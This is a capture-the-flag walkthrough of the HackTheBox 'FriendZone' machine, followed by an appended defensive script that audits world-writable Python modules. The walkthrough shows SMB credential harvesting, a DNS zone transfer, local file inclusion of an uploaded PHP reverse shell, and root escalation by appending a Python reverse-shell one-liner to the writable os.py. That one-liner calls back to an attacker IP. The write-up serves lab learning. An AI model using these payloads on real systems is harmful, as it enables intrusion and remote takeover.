HacktheBox FriendZone: Walkthrough


As with other boxes, let's start with an nmap scan.

NMAP

We have ports 21, 22, 53, 80, 139, 443 and 445.

PORT 139,445 (SMB)

On enumerating the Samba shares I found two, general and Development. On the general share I have read permission, and on Development I have read as well as write permission:

Gathering credentials from the general share:

username : admin

Password : [email protected]#

Right now I don't know where I'll call the shell from, so I moved on to the other ports.

PORT 443

Checking Certificate

I have one domain here, so with this I can try a DNS zone transfer (the machine name also gives us a hint to do that: “Friend” “ZONE”).

Let's try a zone transfer against it.

Command : dig axfr friendzone.red @10.10.10.123

I can successfully transfer the zone 🙂 Now let's add the entry to the /etc/hosts file.

Visiting administrator1 (subdomain)

I can log in here with the creds found on the Samba general share:

Credential : admin:[email protected]#

Visiting Dashboard

As given on the page, I visited: image_id=a.jpg&pagename=timestamp

url : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

Getting shell

Now I know where I can call my shell from, so I uploaded “php-reverse-shell” to the Development share and called it through the pagename parameter.

Calling shell :

url : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

Way to User :

On checking the web directory I found a file that contains the credentials for the user friend.

Reading user.txt

Privilege Escalation :

On running pspy I saw a process running as root:

/opt/server_admin/reporter.py

[email protected]:/opt/server_admin$ cat reporter.py 
#!/usr/bin/python

import os

to_address = "[email protected]"
from_address = "[email protected]"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to [email protected] -from [email protected] -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
[email protected]:/opt/server_admin$ 

I don’t have permission to write to this file, so I checked whether I can write to Python’s “os” module file, because the script only imports “os”.

File location : /usr/lib/python2.7/os.py

Now that I know I have permission to write to os.py, I pasted my Python shell at the end of os.py.

My Shell :

def myfunction():import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.30",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
myfunction()
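
A defender's check for the weakness used above, as an added example that is not part of the original walkthrough: it lists module files and directories on a Python import path that any local user can modify, which is what lets a root-run script such as reporter.py load code someone else wrote. The helper names and the 0666 mode on the sample os.py are assumptions; the page only says the file was writable.

```python
import os
import stat
import sys
import tempfile


def audit_import_path(paths=None):
    """Return sorted paths of world-writable modules/dirs on the import path."""
    findings = set()
    for root in (sys.path if paths is None else paths):
        if not os.path.isdir(root):
            continue  # zip archives, missing entries
        for dirpath, _dirs, files in os.walk(root):
            mods = [f for f in files if f.endswith((".py", ".pyc", ".so"))]
            for entry in [dirpath] + [os.path.join(dirpath, f) for f in mods]:
                try:
                    st = os.lstat(entry)
                except OSError:
                    continue  # vanished or unreadable
                if stat.S_ISLNK(st.st_mode):
                    continue  # link mode bits say nothing about the target
                if st.st_mode & stat.S_IWOTH:
                    findings.add(entry)
    return sorted(findings)


def demo():
    """Constructed tree: a stdlib-style os.py left 0666 (assumed mode)."""
    with tempfile.TemporaryDirectory() as lib:
        os.chmod(lib, 0o755)
        for name, mode in (("os.py", 0o666), ("socket.py", 0o644)):
            path = os.path.join(lib, name)
            with open(path, "w") as fh:
                fh.write("# constructed sample module\n")
            os.chmod(path, mode)
        return [os.path.basename(p) for p in audit_import_path([lib])]


if __name__ == "__main__":
    print("constructed tree:", demo())
    for path in audit_import_path():  # the running interpreter's real path
        print("world-writable:", path)
```

For the case on this page, pass the Python 2.7 library directory explicitly, for example audit_import_path(["/usr/lib/python2.7"]), since the cron job runs under that interpreter.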